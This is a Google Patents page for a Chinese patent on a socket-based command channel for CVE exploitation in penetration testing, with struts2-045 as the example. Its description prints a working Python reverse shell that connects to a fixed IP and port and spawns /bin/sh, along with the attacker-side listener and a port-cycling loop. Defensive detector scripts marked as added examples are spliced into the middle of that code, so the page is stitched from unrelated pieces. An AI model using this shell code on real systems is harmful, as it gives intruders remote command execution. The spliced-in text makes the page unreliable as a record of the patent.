CN112291275B - Command interaction implementation method for CVE vulnerability penetration utilization - Google Patents

Info

Publication number
CN112291275B
Authority
CN
China
Prior art keywords
socket
machine
command
attack
script
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN202011556162.5A
Other languages
Chinese (zh)
Other versions
CN112291275A (en)
Inventor
郝龙
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Webray Beijing Network Safety Technology Co ltd
Original Assignee
Webray Beijing Network Safety Technology Co ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Webray Beijing Network Safety Technology Co ltd filed Critical Webray Beijing Network Safety Technology Co ltd
Priority to CN202011556162.5A priority Critical patent/CN112291275B/en
Publication of CN112291275A publication Critical patent/CN112291275A/en
Application granted granted Critical
Publication of CN112291275B publication Critical patent/CN112291275B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/145 Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416 Event detection, e.g. attack signature detection

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention relates to the technical field of information security and discloses a command interaction implementation method for CVE vulnerability penetration utilization, comprising the following steps: S1, socket pipeline communication is established between the attack machine and the target machine; S2, the attack machine constructs a function or script containing an executable command and sends it to the target machine through the socket pipeline; and S3, the target machine receives and executes the function or script through the socket pipeline and feeds the execution result back to the attack machine as loopback information. The method encapsulates the operations of the session interaction during penetration utilization, and, by synchronizing the task information to the socket, solves the problem of recording the CVE vulnerability penetration utilization (EXP) operation process.

Description

Command interaction implementation method for CVE vulnerability penetration utilization
Technical Field
The invention relates to the technical field of information security testing, in particular to a command interaction implementation method for CVE vulnerability penetration utilization, which is applied to penetration testing.
Background
Network security is becoming more important, and penetration testing is a method of evaluating the security of a computer network system by simulating the attack of a malicious hacker. The penetration testing process includes active analysis of any weaknesses, technical flaws, or vulnerabilities of the system from a position an attacker might occupy, and conditional active exploitation of the security vulnerabilities from that position. Carried out in the manner of a real incident, the penetration test checks from the attacker's perspective whether the security protection measures of the service system are effective and whether each security policy is actually applied; after the test, a penetration test report is written and fed back to the client so that security hardening can be carried out immediately and the security problems found by the test resolved.
Penetration tools are an important means of conducting penetration tests and involve POC, EXP, CVE, etc., where:
POC (Proof of Concept) usually refers to a piece of code that proves a vulnerability and is used in vulnerability reports; the POC in a vulnerability report is a description or an attack sample that lets the reader confirm that the vulnerability really exists;
EXP (Exploit), meaning "penetration utilization", refers to the act of attacking by using a system vulnerability; it is a detailed description of how to exploit the vulnerability, or demonstration attack code, that lets the reader fully understand the mechanism and exploitation method of the vulnerability;
CVE (Common Vulnerabilities & Exposures) vulnerability number: Common Vulnerabilities and Exposures, such as CVE-2015-.
CVE works like a dictionary, giving a common name to widely recognized information security vulnerabilities or weaknesses that have been exposed. If a vulnerability indicated in a vulnerability report has a CVE name assigned, readers of the report can quickly find the corresponding patching information in any other CVE-compatible database and quickly solve the security problem.
Existing penetration testing schemes mainly perform vulnerability verification through POC and do not perform penetration utilization (EXP). For penetration utilization (EXP) of CVE vulnerabilities, they create a pseudo-interactive state by sending and receiving data packets: real-time interaction cannot be achieved, an interactive session cannot be established in the encapsulation process, and there is no process record of the penetration utilization (EXP) operation. Meanwhile, the existing rebound (reverse) shell method cannot establish a persistent session during the test.
Disclosure of Invention
An object of the present invention is to solve at least the above problems and to provide at least the advantages described later.
The invention also aims to provide a command interaction implementation method for CVE vulnerability penetration utilization, so as to achieve the purposes of implementing command real-time interaction and command encapsulation of penetration utilization.
In order to achieve the above objects and other objects, the present invention adopts the following technical solutions:
A command interaction implementation method for CVE vulnerability penetration utilization is provided, comprising the following steps:
S1, socket pipeline communication is established between the attack machine and the target machine;
S2, the attack machine constructs a function or script containing an executable command and sends it to the target machine through the socket pipeline;
and S3, the target machine receives and executes the function or script through the socket pipeline and feeds the execution result back to the attack machine as loopback information.
More specifically, the step of establishing socket pipe communication between the attack machine and the target machine in step S1 includes the following steps:
S101, the attack machine obtains the current environment information of the target machine by sending a basic packet to the target machine;
S102, the attack machine constructs a target-side socket establishing script according to the current environment information of the target machine and sends it to the target machine;
S103, the target machine receives and executes the target-side socket establishing script, establishing the socket pipeline;
S104, the attack machine constructs and executes an attack-side socket establishing script, building a monitoring environment and completing the closed loop of socket pipeline communication.
More specifically, the executable commands in the function or script containing executable commands constructed by the attack machine in step S2 include, but are not limited to, the following command types:
a command set for supporting the interactive session between the attack machine and the target machine through the socket pipeline; and/or,
a command set for supporting vulnerability penetration utilization (EXP) attack payloads; and/or,
a command set for supporting manual control.
More specifically, the command set for supporting the interactive session between the attack machine and the target machine through the socket pipe specifically includes:
commands for the WINDOWS operating system: ipconfig, dir, netstat -ano (root authority), whoami, route (root authority), systeminfo, tree; or,
commands for the Linux operating system: ls, ps, whoami, pwd, cd basic commands, netstat (root authority), uname -a.
More specifically, the command set for supporting the vulnerability penetration utilization (EXP) attack payload includes the following commands, which are supported by both the WINDOWS operating system and the Linux operating system:
sysinfo for system information; ps (process list) as a system command; ls, download, pwd, cd for file browsing; and ifconfig, route, netstat as network commands.
More specifically, the command interaction implementation method for CVE vulnerability penetration utilization further includes the following steps:
and S4, tasks are issued during execution of the CVE vulnerability penetration utilization (EXP); in the task issuing process the issued information is set as transmission variables and synchronized into the socket pipeline, and the socket completes the encapsulated issuing, realizing the penetration utilization (EXP) interactive session.
More specifically, the issued information includes any one or a combination of the following: target address, target port, loopback address, loopback port, vulnerability number.
More specifically, in the task issuing process, tasks are issued to high ports preferentially; the port information in the task is a port group, and the task can be issued cyclically through the port group: if the socket is found to be connected successfully, the loop is exited; if the socket is found not to be connected, the task continues to be issued.
Further, the function or script may be constructed in any one of the following programming languages: python language, or PHP language, or JAVA language, or PERL language.
More specifically, the attack machine and the target machine involved in the command interaction implementation method may be a PC, a server, a cloud server, a notebook computer, and a smartphone terminal.
The invention at least comprises the following beneficial effects:
In the command interaction implementation method for CVE vulnerability penetration utilization, a socket pipeline is used to solve the problem of establishing an interactive session during CVE vulnerability penetration utilization (EXP); the operations of the session interaction are encapsulated in a script or function containing commands; and synchronizing the task information to the socket solves the problem of recording the CVE vulnerability penetration utilization (EXP) operation process.
Additional advantages, objects, and features of the invention will be set forth in part in the description which follows and in part will become apparent to those having ordinary skill in the art upon examination of the following or may be learned from practice of the invention.
Drawings
FIG. 1 is a socket pipe communication diagram of an attack machine and a target machine provided by the present invention;
FIG. 2 is a flow chart of a command interaction implementation method of vulnerability penetration leveraging provided by the present invention;
FIG. 3 is a flow chart of establishing a socket pipe according to the present invention.
Detailed Description
The present invention is described in detail below with reference to the attached drawings so that those skilled in the art can implement the invention by referring to the description.
The most common network protocol for network connections is TCP/IP, but calling the TCP/IP protocol family directly is very complicated; CVE vulnerability penetration utilization (EXP) makes extensive use of TCP/IP, yet calling it directly is very difficult. A socket is an intermediate software abstraction layer through which the application layer communicates with the TCP/IP protocol suite, which is hidden behind the socket interface.
As shown in FIG. 1, a socket pipe may be used between an attack machine and a target machine to establish an interactive shell; the command or function to be executed is transmitted through the socket pipe, and a session for executing commands between the attack machine and the target machine can be established simply by keeping the socket pipe communication connected throughout the penetration utilization (EXP) process.
As shown in FIG. 2, a command interaction implementation method for CVE vulnerability penetration utilization between an attack machine and a target machine is provided, comprising the following steps:
S1, socket pipeline communication is established between the attack machine and the target machine;
S2, the attack machine constructs a function or script containing an executable command and sends it to the target machine through the socket pipeline;
S3, the target machine receives and executes the function or script through the socket pipeline and feeds the execution result back to the attack machine as loopback information;
and S4, tasks are issued during execution of the CVE vulnerability penetration utilization (EXP); in the task issuing process the issued information is set as transmission variables and synchronized into the socket pipeline, and the socket completes the encapsulated issuing, realizing the penetration utilization (EXP) interactive session.
In the above scheme, the attack machine and the target machine may have different software and hardware environments, and command execution results may differ between environments, so the basic conditions for establishing the socket pipeline must be considered: the basic environment of the target machine is identified before the socket pipeline is established, the target-side socket establishment appropriate to that environment is executed, a session is established with the target machine, and then the encapsulated command is executed. However, socket pipe communication can only transmit data, and transmitting it directly achieves nothing by itself, so input and results must be redirected to bash for execution, and the interactive session has to be designed on top of socket pipe communication.
FIG. 3 shows the specific flow for establishing a socket pipe; the step of establishing socket pipe communication between the attack machine and the target machine in step S1 of FIG. 2 further includes the following steps:
S101, the attack machine obtains the current environment information of the target machine by sending a basic packet to the target machine;
S102, the attack machine constructs a target-side socket establishing script according to the current environment information of the target machine and sends it to the target machine;
S103, the target machine receives and executes the target-side socket establishing script, establishing the socket pipeline;
S104, the attack machine constructs and executes an attack-side socket establishing script, building a monitoring environment and completing the closed loop of socket pipeline communication.
Preferably, the executable commands in the function or script constructed by the attack machine in step S2 of the above scheme are mainly of the following three command types:
(1) A command set for supporting the interactive session between the attack machine and the target machine through the socket pipeline;
Specifically, the commands for the WINDOWS operating system: ipconfig, dir, netstat -ano (root authority), whoami, route (root authority), systeminfo, tree; the commands for the Linux operating system: ls, ps, whoami, pwd, cd basic commands, netstat (root authority), uname -a.
(2) A command set for supporting vulnerability penetration utilization (EXP) attack payloads;
Specifically, the following commands, which are supported by both the WINDOWS operating system and the Linux operating system:
sysinfo for system information; ps (process list) as a system command; ls, download, pwd, cd for file browsing; and ifconfig, route, netstat as network commands.
(3) A command set for supporting manual control.
Specifically, the manually operable commands include: whoami, ifconfig/ipconfig, netstat, route, system information (Windows: systeminfo, Linux: uname -a), directory (Windows: dir, Linux: ls).
Preferably, in step S4, the issued information includes any one or a combination of the following: target address, target port, loopback address, loopback port, vulnerability number. In the task issuing process, tasks are issued to high ports preferentially; the port information in the task is a port group, and the task can be issued cyclically through the port group: if the socket is found to be connected successfully, the loop is exited; if the socket is found not to be connected, the task continues to be issued.
In the schemes shown in FIG. 2 and FIG. 3, the scripts or functions involved in the respective steps may be written in any of several programming languages, such as Python, PHP, JAVA, PERL, and the like. The attack machine and the target machine involved in the command interaction implementation method may be a PC (personal computer), a server, a cloud server, a notebook computer, or a smartphone terminal.
Following the above technical solution, a command interaction implementation for session establishment and penetration utilization (EXP) is described in detail below, taking the struts2-045 vulnerability as an example.
First, socket pipe communication needs to be established between the attack machine and the target machine.
The attack machine completes one basic packet transmission, obtains the current environment information of the target machine through struts2-045, and determines the specific environment of the target machine; for example, the environment information obtained is: Linux environment, root authority, Python environment. Based on the identified environment of the target machine (Linux), the attack machine constructs the corresponding Python script for establishing socket communication; this script is sent to the target machine and executed there.
The Python script is:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.190.1",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
The scripts for common environments are constructed and managed uniformly; depending on the programming language, the constructed script may be a PHP script, a JAVA script, a PERL script, and so on.
A script may further be written for the type of operating system, for example a script file of the corresponding version for the Linux and WINDOWS operating systems.
Correspondingly, the attack machine (the opposite end) constructs the corresponding Python script to establish socket communication; the constructed Python script is as follows, using a socket to build the monitoring environment and complete the communication closed loop.
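From the defender's side, the target-side script above leaves a distinctive trace: after the three dup2 calls, file descriptors 0, 1 and 2 of the Python process and of the /bin/sh it spawns all point at one and the same socket. The following host check is an added example, not part of the patent; the snapshot layout, the severity labels and the sample process table are assumptions constructed for illustration.

```python
"""Flag processes whose stdin, stdout and stderr are all the same socket.

Added example, not from the patent. On Linux, /proc/<pid>/fd/<n> is a
symlink whose target looks like 'socket:[48213]', 'pipe:[9911]' or
'/dev/pts/0'.
"""
import os
import re

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "ash"}


def socket_inode(link):
    """Return the socket inode of an fd link target, or None if not a socket."""
    m = SOCKET_LINK.match(link or "")
    return int(m.group(1)) if m else None


def classify(fd_links, comm=""):
    """Return a finding if fds 0, 1 and 2 share one socket, else None.

    A shell in that state is rated 'high'. Other programs are 'medium',
    because inetd-style services legitimately run with a socket on their
    standard streams and need an allowlist decision.
    """
    inodes = [socket_inode(fd_links.get(fd)) for fd in (0, 1, 2)]
    if None in inodes or len(set(inodes)) != 1:
        return None
    severity = "high" if comm in SHELL_NAMES else "medium"
    return {"inode": inodes[0], "severity": severity}


def scan(snapshot):
    """Scan {pid: {'comm': str, 'fds': {fd: link}}} and list findings by pid."""
    findings = []
    for pid, info in sorted(snapshot.items()):
        hit = classify(info["fds"], info.get("comm", ""))
        if hit:
            findings.append({"pid": pid, "comm": info.get("comm", ""), **hit})
    return findings


def read_proc(proc_root="/proc"):
    """Build a snapshot from a live Linux /proc (root sees all processes)."""
    snapshot = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        fds = {}
        try:
            for fd in (0, 1, 2):
                fds[fd] = os.readlink(os.path.join(base, "fd", str(fd)))
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited meanwhile, or access was denied
        snapshot[int(entry)] = {"comm": comm, "fds": fds}
    return snapshot


# Constructed sample process table (pids and inodes are made up).
SAMPLE = {
    812: {"comm": "sshd",
          "fds": {0: "/dev/null", 1: "socket:[30111]", 2: "socket:[30111]"}},
    2290: {"comm": "bash",
           "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    4417: {"comm": "python3",
           "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    4418: {"comm": "sh",
           "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    5001: {"comm": "cat",
           "fds": {0: "pipe:[9911]", 1: "pipe:[9912]", 2: "/dev/pts/1"}},
}

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

On a live Linux host, `scan(read_proc())` runs the same check against the real process table.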
import socket
sk = socket.socket()
sk.connect_ex(('127.0.0.1',8080))
while 1:
    cmd = input('please enter a command >>')
    sk.send(cmd.encode('utf-8'))
    result = sk.recv(102400).decode('gbk')
    print(result)
sk.close()
In the second step, the attack machine sends the function or script containing the executable command to the target machine through the socket pipe.
When a function or script is built, it can contain the following commands for transmission:
(a) Commands supported during the interactive session. Windows executes: ipconfig, dir, netstat -ano (root authority), whoami, route (root authority), systeminfo, tree; Linux supports the execution of: ls, ps, whoami, pwd, cd basic commands, netstat (root authority), uname -a.
(b) For the EXP attack payload, both Windows and Linux support the following commands:
System information: sysinfo
System command: ps process list, sysinfo
File browsing: ls, download, pwd, cd
Network command: ifconfig, route, netstat
(c) Manually operable commands:
Executing a command: whoami, ifconfig/ipconfig, netstat, route, system information (Windows: systeminfo, Linux: uname -a), directory (Windows: dir, Linux: ls)
In the third step, the target machine executes the function or script, and the execution result is fed back to the attack machine.
Through these three steps, the interactive session based on the socket pipeline is essentially established.
The fourth step is the CVE vulnerability penetration utilization (EXP) interactive session.
Tasks are issued on the basis of the CVE vulnerability penetration utilization (EXP) execution process. In task issuing, the following information (target address, target port, loopback address, loopback port and vulnerability number) is set as transmission variables and synchronized into the socket; the socket completes the encapsulated issuing, finally achieving the penetration utilization (EXP) interactive session.
In testing, the port in the loopback information of the interactive session was often found to be already occupied, and a two-step design was made for this situation:
1: Issue the task to a high port, where the port information in the task is a port group; for the first issuing cycle, the port information is stored in a database by default;
2: If the socket is found to be connected successfully, exit the loop; if the socket is found not to be connected, continue to issue the task.
This improved two-step design can be realized with the following Python script as a sample:
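port = 12345      # first high port of the port group
session = 0       # 0: socket not connected; non-zero: connected
for i in range(1000):
    if session == 0:
        port = port + 1   # not connected: move to the next port and issue again
    else:
        break             # connected: jump out of the loop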
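Seen in egress logs, the port-group loop above appears as one internal host trying the same external address on consecutive high ports until one attempt is accepted. The following detector is an added example, not part of the patent; the log line format, the field names, the thresholds and the sample lines (documentation address ranges) are assumptions constructed for illustration.

```python
"""Detect a walk over consecutive high destination ports that ends in a connect.

Added example, not from the patent. The input is a constructed firewall-style
log: '<UTC timestamp> src=<ip> dst=<ip> dport=<n> action=<allow|reset|drop>'.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\w+)$"
)
HIGH_PORT = 1024                  # assumption: "high port" means >= 1024
MIN_RUN = 3                       # assumption: 3 consecutive ports is a walk
WINDOW = timedelta(seconds=120)   # assumption: whole walk fits in 2 minutes


def parse(lines):
    """Turn log lines into event dicts, skipping lines that do not match."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": m["src"],
            "dst": m["dst"],
            "dport": int(m["dport"]),
            "action": m["action"],
        })
    return events


def find_port_walks(events, min_run=MIN_RUN, window=WINDOW):
    """Return one finding per run of +1 port steps between the same two hosts.

    A run is extended only while the previous attempt failed, which mirrors
    the loop on this page: keep moving to the next port until connected.
    """
    by_pair = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["dport"] >= HIGH_PORT:
            by_pair[(ev["src"], ev["dst"])].append(ev)

    findings = []
    for (src, dst), evs in by_pair.items():
        run = [evs[0]]
        for ev in evs[1:] + [None]:        # trailing None flushes the last run
            if (ev is not None
                    and ev["dport"] == run[-1]["dport"] + 1
                    and run[-1]["action"] != "allow"
                    and ev["ts"] - run[0]["ts"] <= window):
                run.append(ev)
                continue
            if len(run) >= min_run:
                findings.append({
                    "src": src,
                    "dst": dst,
                    "first_port": run[0]["dport"],
                    "last_port": run[-1]["dport"],
                    "attempts": len(run),
                    "connected": run[-1]["action"] == "allow",
                })
            if ev is not None:
                run = [ev]
    return findings


# Constructed sample log lines.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z src=10.0.5.23 dst=203.0.113.7 dport=12345 action=reset
2024-05-01T10:00:01Z src=10.0.5.40 dst=198.51.100.9 dport=443 action=allow
2024-05-01T10:00:02Z src=10.0.5.23 dst=203.0.113.7 dport=12346 action=reset
2024-05-01T10:00:03Z src=10.0.5.41 dst=198.51.100.20 dport=50000 action=allow
2024-05-01T10:00:04Z src=10.0.5.23 dst=203.0.113.7 dport=12347 action=reset
2024-05-01T10:00:06Z src=10.0.5.23 dst=203.0.113.7 dport=12348 action=allow
2024-05-01T10:00:09Z src=10.0.5.41 dst=198.51.100.20 dport=50001 action=allow
""".splitlines()

if __name__ == "__main__":
    for finding in find_port_walks(parse(SAMPLE_LOG)):
        print(finding)
```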
The technical scheme of the invention can realize visualization of the penetration process, complete zero trust of the penetration test for penetration utilization (EXP) of CVE vulnerabilities, and realize session interaction through penetration utilization (EXP). The function or script constructed in the interaction process can be constructed in any one of the following programming languages: Python, PHP, JAVA, or PERL.
More specifically, the attack machine and the target machine involved in the command interaction implementation method may be a PC, a server, a cloud server, a notebook computer, and a smartphone terminal.
While embodiments of the invention have been described above, it is not limited to the applications set forth in the description and the embodiments, which are fully applicable in various fields of endeavor to which the invention pertains, and further modifications may readily be made by those skilled in the art, it being understood that the invention is not limited to the details shown and described herein without departing from the general concept defined by the appended claims and their equivalents.

Claims (10)

1. A command interaction implementation method for CVE vulnerability penetration utilization, comprising the following steps:
S1, socket pipeline communication is established between the attack machine and the target machine;
S2, the attack machine constructs a function or script containing an executable command and sends it to the target machine through the socket pipeline;
and S3, the target machine receives and executes the function or script through the socket pipeline and feeds the execution result back to the attack machine as loopback information.
2. The command interaction implementation method for CVE vulnerability penetration utilization according to claim 1, wherein the step of establishing socket pipe communication between the attack machine and the target machine in step S1 further comprises the following steps:
S101, the attack machine obtains the current environment information of the target machine by sending a basic packet to the target machine;
S102, the attack machine constructs a target-side socket establishing script according to the current environment information of the target machine and sends it to the target machine;
S103, the target machine receives and executes the target-side socket establishing script, establishing the socket pipeline;
S104, the attack machine constructs and executes an attack-side socket establishing script, building a monitoring environment and completing the closed loop of socket pipeline communication.
3. The command interaction implementation method for CVE vulnerability penetration utilization according to claim 1, wherein the executable commands in the function or script constructed by the attack machine in step S2 include, but are not limited to, the following command types:
a command set for supporting the interactive session between the attack machine and the target machine through the socket pipeline; and/or,
a command set for supporting vulnerability penetration utilization (EXP) attack payloads; and/or,
a command set for supporting manual control.
4. The command interaction implementation method for CVE vulnerability penetration utilization according to claim 3, wherein the command set for supporting the interactive session between the attack machine and the target machine through the socket pipe specifically includes:
commands for the WINDOWS operating system: ipconfig, dir, netstat -ano (root authority), whoami, route (root authority), systeminfo, tree; or,
commands for the Linux operating system: ls, ps, whoami, pwd, cd basic commands, netstat (root authority), uname -a.
5. The command interaction implementation method for CVE vulnerability penetration utilization according to claim 3, wherein the command set for supporting the vulnerability penetration utilization (EXP) attack payload specifically includes the following commands, which are supported by both the WINDOWS operating system and the Linux operating system:
sysinfo for system information; ps (process list) as a system command; ls, download, pwd, cd for file browsing; and ifconfig, route, netstat as network commands.
6. The command interaction implementation method for CVE vulnerability penetration utilization according to any one of claims 1 to 3, further comprising the following step:
S4, tasks are issued during execution of the CVE vulnerability penetration utilization (EXP); in the task issuing process the issued information is set as transmission variables and synchronized into the socket pipeline, and the socket completes the encapsulated issuing, realizing the penetration utilization (EXP) interactive session.
7. The command interaction implementation method for CVE vulnerability penetration utilization according to claim 6, wherein the issued information comprises any one or a combination of the following: target address, target port, loopback address, loopback port, vulnerability number.
8. The command interaction implementation method for CVE vulnerability penetration utilization according to claim 6, wherein, in the task issuing process, tasks are issued to high ports preferentially; the port information in the task is a port group, and the task can be issued cyclically through the port group: if the socket is found to be connected successfully, the loop is exited; if the socket is found not to be connected, the task continues to be issued.
9. The command interaction implementation method for CVE vulnerability penetration utilization according to any one of claims 1 to 5, wherein the function or script may be constructed in any one of the following programming languages: Python, PHP, JAVA, or PERL.
10. The command interaction implementation method for CVE vulnerability penetration utilization according to claim 6, wherein the attack machine and the target machine involved in the command interaction implementation method may be a PC, a server, a cloud server, a notebook computer, or a smartphone terminal.
CN202011556162.5A 2020-12-25 2020-12-25 Command interaction implementation method for CVE vulnerability penetration utilization Active CN112291275B (en)

Publications (2)

Publication Number Publication Date
CN112291275A CN112291275A (en) 2021-01-29
CN112291275B true CN112291275B (en) 2021-03-26

Family

ID=74426408

Country Status (1)

Country Link
CN (1) CN112291275B (en)

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101482847A (en) * 2009-01-19 2009-07-15 北京邮电大学 Detection method based on safety bug defect mode
CN101695033A (en) * 2009-09-25 2010-04-14 上海交通大学 Network fragility analyzing system based on privilege lift
US10574685B2 (en) * 2014-11-11 2020-02-25 Goldman Sachs & Co. LLC Synthetic cyber-risk model for vulnerability determination

Family Cites Families (9)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20030056116A1 (en) * 2001-05-18 2003-03-20 Bunker Nelson Waldo Reporter
CN102843690B (en) * 2012-09-24 2014-12-17 东南大学 Wireless access point-based penetration test system and test method thereof
CN104363236A (en) * 2014-11-21 2015-02-18 西安邮电大学 Automatic vulnerability validation method
US10614222B2 (en) * 2017-02-21 2020-04-07 Microsoft Technology Licensing, Llc Validation of security monitoring through automated attack testing
CN108111482A (en) * 2017-11-24 2018-06-01 国网天津市电力公司电力科学研究院 A kind of intelligent grid industrial control network safety test system and test method
CN109325351B (en) * 2018-08-23 2021-04-09 中通服咨询设计研究院有限公司 Security hole automatic verification system based on public testing platform
CN110233822A (en) * 2019-04-30 2019-09-13 西安交大捷普网络科技有限公司 A kind of vulnerability rapid scanning method and vulnerability scanners
CN110708182A (en) * 2019-05-15 2020-01-17 国家计算机网络与信息安全管理中心 Security detection method and device for network printer protocol
CN110768948A (en) * 2019-08-14 2020-02-07 奇安信科技集团股份有限公司 Vulnerability detection method and device, storage medium and electronic device

Also Published As

Publication number Publication date
CN112291275A (en) 2021-01-29

Similar Documents

Publication Publication Date Title
CN111294345B (en) Vulnerability detection method, device and equipment
US8990944B1 (en) Systems and methods for automatically detecting backdoors
US5987523A (en) Applet redirection for controlled access to non-orginating hosts
Peter et al. A practical guide to honeypots
US7647631B2 (en) Automated user interaction in application assessment
CN106339309B (en) Application program testing method, client and system
Stasinopoulos et al. Commix: automating evaluation and exploitation of command injection vulnerabilities in Web applications
US20080148298A1 (en) System and Methods for Providing Granular Security for Locally Running Scripted Environments and Web Applications
US10152590B2 (en) Implementing a WebSocket server to circumvent access controls, by a web browser, on a web application
KR102017038B1 (en) An access control system for web applications
US20210312048A1 (en) Analyzing multiple cpu architecture malware samples
CN108600378B (en) File downloading method, device, terminal and storage medium
Kwon et al. Protocol fuzzing to find security vulnerabilities of RabbitMQ
CN102710663B (en) Method and device for obtaining cloud service
CN105518693B (en) A kind of safety protecting method and device
US20200358786A1 (en) Dynamic injection or modification of headers to provide intelligence
CN108512889B (en) Application response pushing method based on HTTP and proxy server
CN112291275B (en) Command interaction implementation method for CVE vulnerability penetration utilization
US7650392B1 (en) Dynamic content processing in a reverse proxy service
JP6867552B2 (en) Judgment method, judgment device and judgment program
CN114124935A (en) Method, system, equipment and storage medium for realizing FTP service
Mishra et al. Multi tree view of complex attack–stuxnet
Kuosmanen Security Testing of WebSockets
Evdokimov et al. Intel AMT Stealth Breakthrough
Koch On WebSockets in penetration testing

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant